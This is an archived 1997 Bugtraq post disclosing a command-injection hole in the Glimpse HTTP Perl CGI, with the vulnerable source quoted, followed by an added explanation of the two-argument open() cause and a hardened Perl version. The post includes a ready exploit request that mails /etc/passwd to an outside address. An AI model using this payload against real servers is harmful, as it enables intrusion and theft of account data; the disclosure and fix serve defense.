Bugtraq mailing list archives
Vulnerability in Glimpse HTTP
From: drazvan () kappa ro (Razvan Dragomirescu)
Date: Wed, 2 Jul 1997 19:32:09 +0300
Hi, I'm back with another vulnerability, this time in a small utility: Glimpse HTTP, which is an interface to the Glimpse search tool. It is written in PERL. First my congratulations to the authors. They've done a really great job in securing the program (really, I mean it). The hole I exploited is a small one but it can allow you to execute any command on the remote system (as the owner of the http server). Allow me to quote from the source (I'm sure I have the latest version, I downloaded it 1 hour ago :) ).

--begin--
$path_info = $ENV{'PATH_INFO'};
$_ = $path_info;
# /<length>/$indexdir/$path is the format of the PATH_INFO
# might as well start the message now
print "Content-type: text/html\n\n";
print "<HTML>\n";
print "<HEAD>\n";
if ( m|^/([0-9]*)(.*)$| ) {
    $length = $1;
    $path = $2;
    $path =~ s|"||g;
} else {
    &err_badargs;
}
$indexdir = substr($path,0,$length);
$relpath = substr($path,$length,length($path));
# print "<br>indexdir=$indexdir<br>relpath=$relpath<br>";
open(CONF,"$indexdir/archive.cfg") || &err_conf;
--end--

As you may see, it splits PATH_INFO in two fields: $length and $path, and then takes the first $length characters from $path and puts them in $indexdir (my phrasing is more twisted than my mind :) ). The last line opens "$indexdir/archive.cfg".

Now for the evil part. By setting $indexdir to a string that begins with '|', the system will execute whatever it finds after the pipe, giving it as STDIN what you write to the CONF handle. The bad thing is that most HTTP servers won't let you use TABS or SPACES in the PATH_INFO (not the case of Netscape servers anyway, but CERN and Apache will do it). And I don't know how many "one word" commands anyone can find (and make them do evil). Here's where the famous IFS variable comes in handy. If $indexdir is set to something like "|IFS=5;CMD=5mail5drazvan\@pop3.kappa.ro\</etc/passwd;eval$CMD;echo" it will execute the command in CMD using IFS as separator.

The one above sends me your /etc/passwd (so you'd better change something there :) ). The last "echo" is used to ignore the rest of the string. And of course you can use any other separator instead of "5".

Now for the exploit.

telnet target.machine.com 80
GET /cgi-bin/aglimpse/80|IFS=5;CMD=5mail5drazvan\@pop3.kappa.ro\</etc/passwd;eval$CMD;echo HTTP/1.0

Note that the cgi-bin directory could be located somewhere else (for example in /scripts or /cgi or a special directory just for glimpse...). Also note that you HAVE to use all those backslashes in the command (perl wants them there!).

I would like (again) to have some feedback from those who have Glimpse installed on their systems. It should work if the script has not been modified.

I think that would be all. Be good.

Razvan
--
Razvan Dragomirescu drazvan () kappa ro, drazvan () romania ro, drazvan () roedu net
Phone: +40-1-6866621
"Smile, tomorrow will be worse" (Murphy)
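The root cause in the quoted script is Perl's two-argument open(), which interprets a leading '|' in the filename string as a pipe mode. The following added illustration (not code from the post or from Glimpse HTTP) reproduces the PATH_INFO parsing quoted above and puts the vulnerable open() beside a hardened version that validates $indexdir and uses three-argument open() with an explicit read mode; the sub names and the two sample PATH_INFO values are assumptions made for this example.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Reproduces the PATH_INFO parsing quoted from aglimpse: "/<length><path>",
# where the first <length> characters of <path> are the index directory.
sub parse_path_info {
    my ($path_info) = @_;
    return unless $path_info =~ m|^/([0-9]+)(.*)$|;
    my ($length, $path) = ($1, $2);
    $path =~ s|"||g;
    my $indexdir = substr($path, 0, $length);
    my $relpath  = substr($path, $length);
    return ($indexdir, $relpath);
}

# Vulnerable form (never called below): two-argument open() treats a leading
# '|' in the string as a mode, so an indexdir of "|cmd" runs cmd via the shell.
sub open_config_unsafe {
    my ($indexdir) = @_;
    open(CONF, "$indexdir/archive.cfg") or return;
    return \*CONF;
}

# Hardened form: the directory must be a plain absolute path made of a
# conservative character class (no '|', '<', '>', whitespace or quotes) with
# no ".." component, and open() receives '<' as a separate mode argument, so
# the string can only ever be interpreted as a filename.
sub indexdir_is_safe {
    my ($indexdir) = @_;
    return 0 unless defined $indexdir && $indexdir =~ m{^(/[A-Za-z0-9_.-]+)+$};
    return 0 if $indexdir =~ m{(^|/)\.\.(/|$)};
    return 1;
}

sub open_config_safe {
    my ($indexdir) = @_;
    return unless indexdir_is_safe($indexdir);
    open(my $fh, '<', "$indexdir/archive.cfg") or return;
    return $fh;
}

# Constructed inputs (not from the post): a benign request, and one whose
# index directory begins with a pipe as in the report. Only the check runs.
for my $pi ('/15/var/glimpse/db/some/file', '/12|placeholder/some/file') {
    my ($indexdir, $relpath) = parse_path_info($pi);
    printf "%-30s indexdir=%-16s safe=%d\n", $pi, $indexdir, indexdir_is_safe($indexdir);
}
```

Running it prints safe=1 for the first request and safe=0 for the pipe form; running the script under perl -T (taint mode) would additionally refuse the unsafe open() on unchecked CGI input.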